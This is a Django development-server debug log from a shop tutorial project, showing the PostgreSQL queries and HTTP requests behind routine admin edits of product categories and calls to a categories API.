10:20:06 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace ?: (urls.W005) URL namespace 'rest_framework' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 2 issues (0 silenced). DEBUG 2019-12-11 10:36:19,305 utils 29827 140580032059136 (0.005) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-11 10:36:19,310 utils 29827 140580032059136 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() [11/Dec/2019 10:36:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-11 10:37:21,360 utils 29827 140579998615296 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T10:37:21.349385+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 11, 10, 37, 21, 349385, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-11 10:37:21,363 utils 29827 140579998615296 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-11 10:37:21,366 utils 29827 140579998615296 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-11 10:37:21,378 utils 29827 140579998615296 (0.001) SELECT "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_content_type" WHERE ("django_content_type"."app_label" = 'shop' AND "django_content_type"."model" = 'category'); args=('shop', 'category') DEBUG 2019-12-11 10:37:21,439 utils 29827 140579998615296 (0.001) DECLARE "_django_curs_140579998615296_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-11 10:37:21,482 utils 29827 140579998615296 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-25T10:37:21.479875+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 25, 10, 37, 21, 479875, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [11/Dec/2019 10:37:21] "GET /shop/category/10/change/ HTTP/1.0" 200 8024 DEBUG 2019-12-11 10:37:21,755 utils 29827 140579998615296 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T10:37:21.739520+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 11, 10, 37, 21, 739520, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-11 10:37:21,759 utils 29827 140579998615296 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [11/Dec/2019 10:37:21] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-11 10:37:31,182 utils 29827 140579998615296 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-11 10:37:31,193 utils 29827 140579998615296 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-11 10:37:31,198 utils 29827 140579998615296 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-11 10:37:31,202 utils 29827 140579998615296 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-11 10:37:31,206 utils 29827 140579998615296 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-11 10:37:31,210 utils 29827 140579998615296 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-11 10:37:31,214 utils 29827 140579998615296 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-11 10:37:31,219 utils 29827 140579998615296 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-11 10:37:31,223 utils 29827 140579998615296 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-11 10:37:31,227 utils 29827 140579998615296 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-11 10:37:31,231 utils 29827 140579998615296 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-11 10:37:31,277 utils 29827 140579998615296 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-11 10:37:31,280 utils 29827 140579998615296 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1000; args=() DEBUG 2019-12-11 10:37:31,294 utils 29827 140579998615296 (0.002) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T10:37:31.291900+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 11, 10, 37, 31, 291900, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-11 10:37:31,334 utils 29827 140579998615296 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-25T10:37:31.332821+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 25, 10, 37, 31, 332821, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [11/Dec/2019 10:37:31] "GET /api/v1/categories/ HTTP/1.0" 200 15276 [11/Dec/2019 10:37:31] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.0" 200 3385 [11/Dec/2019 10:37:31] "GET /static/rest_framework/css/default.css HTTP/1.0" 200 1131 [11/Dec/2019 10:37:31] "GET /static/rest_framework/css/prettify.css HTTP/1.0" 200 817 [11/Dec/2019 10:37:31] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.0" 200 121457 [11/Dec/2019 10:37:31] "GET /static/rest_framework/js/jquery-3.4.1.min.js HTTP/1.0" 200 88145 [11/Dec/2019 10:37:32] "GET /static/rest_framework/js/csrf.js HTTP/1.0" 200 1719 [11/Dec/2019 10:37:32] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.0" 200 37608 [11/Dec/2019 10:37:32] "GET /static/rest_framework/js/ajax-form.js HTTP/1.0" 200 3597 [11/Dec/2019 10:37:32] "GET /static/rest_framework/js/default.js HTTP/1.0" 200 1268 [11/Dec/2019 10:37:32] "GET /static/rest_framework/img/grid.png HTTP/1.0" 200 1458 [11/Dec/2019 10:37:32] "GET /static/rest_framework/js/prettify-min.js HTTP/1.0" 200 13632 DEBUG 2019-12-11 10:37:46,739 utils 29827 140579905464064 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T10:37:46.730380+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 11, 10, 37, 46, 730380, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-11 10:37:46,741 utils 29827 140579905464064 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-11 10:37:46,744 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-11 10:37:46,750 utils 29827 140579905464064 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."name" = 'BIRDS & INSECTS' AND NOT ("shop_category"."id" = 10)) LIMIT 1; args=('BIRDS & INSECTS', 10) DEBUG 2019-12-11 10:37:46,753 utils 29827 140579905464064 (0.001) UPDATE "shop_category" SET "name" = 'BIRDS & INSECTS', "parent_id" = NULL, "image" = 'categories/2019/12/07/collection10.png', "description" = '', "popular" = true, "slug" = 'birds-insects' WHERE "shop_category"."id" = 10; args=('BIRDS & INSECTS', 'categories/2019/12/07/collection10.png', '', True, 'birds-insects', 10) DEBUG 2019-12-11 10:37:46,755 utils 29827 140579905464064 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-11T10:37:46.754254+00:00'::timestamptz, 6, 8, '10', 'BIRDS & INSECTS', 2, '[{"changed": {"fields": ["popular"]}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 11, 10, 37, 46, 754254, tzinfo=), 6, 8, '10', 'BIRDS & INSECTS', 2, '[{"changed": {"fields": ["popular"]}}]') [11/Dec/2019 10:37:46] "POST /shop/category/10/change/ HTTP/1.0" 302 0 DEBUG 2019-12-11 10:37:47,062 utils 29827 140579905464064 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T10:37:47.052923+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 11, 10, 37, 47, 52923, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-11 10:37:47,064 utils 29827 140579905464064 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-11 10:37:47,067 utils 29827 140579905464064 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-11 10:37:47,068 utils 29827 140579905464064 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-11 10:37:47,073 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-11 10:37:47,155 utils 29827 140579905464064 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-25T10:37:47.153493+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 25, 10, 37, 47, 153493, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [11/Dec/2019 10:37:47] "GET /shop/category/ HTTP/1.0" 200 6950 DEBUG 2019-12-11 10:37:47,469 utils 29827 140579905464064 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T10:37:47.458560+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 11, 10, 37, 47, 458560, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-11 10:37:47,472 utils 29827 140579905464064 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [11/Dec/2019 10:37:47] "GET /jsi18n/ HTTP/1.0" 200 3223 [11/Dec/2019 10:37:47] "GET /static/admin/img/icon-yes.svg HTTP/1.0" 200 436 DEBUG 2019-12-11 10:37:52,940 utils 29827 140579905464064 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-11 10:37:52,947 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-11 10:37:52,951 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-11 10:37:52,955 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-11 10:37:52,959 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-11 10:37:52,963 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-11 10:37:52,966 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-11 10:37:52,970 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-11 10:37:52,974 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-11 10:37:52,978 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-11 10:37:52,982 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-11 10:37:53,016 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-11 10:37:53,020 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1000; args=() DEBUG 2019-12-11 10:37:53,049 utils 29827 140579905464064 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T10:37:53.044255+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 11, 10, 37, 53, 44255, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-11 10:37:53,116 utils 29827 140579905464064 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-25T10:37:53.113993+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 25, 10, 37, 53, 113993, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [11/Dec/2019 10:37:53] "GET /api/v1/categories/ HTTP/1.0" 200 15276 [11/Dec/2019 10:41:42] "GET / HTTP/1.0" 302 0 [11/Dec/2019 10:43:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 10:48:00] "GET / HTTP/1.0" 302 0 [11/Dec/2019 10:53:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 10:55:43] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-11 10:55:43,974 utils 29827 140579905464064 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'lhrt192rhhzrdtq86s7zf1i984i6sndr' LIMIT 1; args=('lhrt192rhhzrdtq86s7zf1i984i6sndr',) DEBUG 2019-12-11 10:55:43,976 utils 29827 140579905464064 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('lhrt192rhhzrdtq86s7zf1i984i6sndr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-25T10:55:43.974750+00:00'::timestamptz); args=('lhrt192rhhzrdtq86s7zf1i984i6sndr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 25, 10, 55, 43, 974750, tzinfo=)) [11/Dec/2019 10:55:43] "GET /login/?next=/ 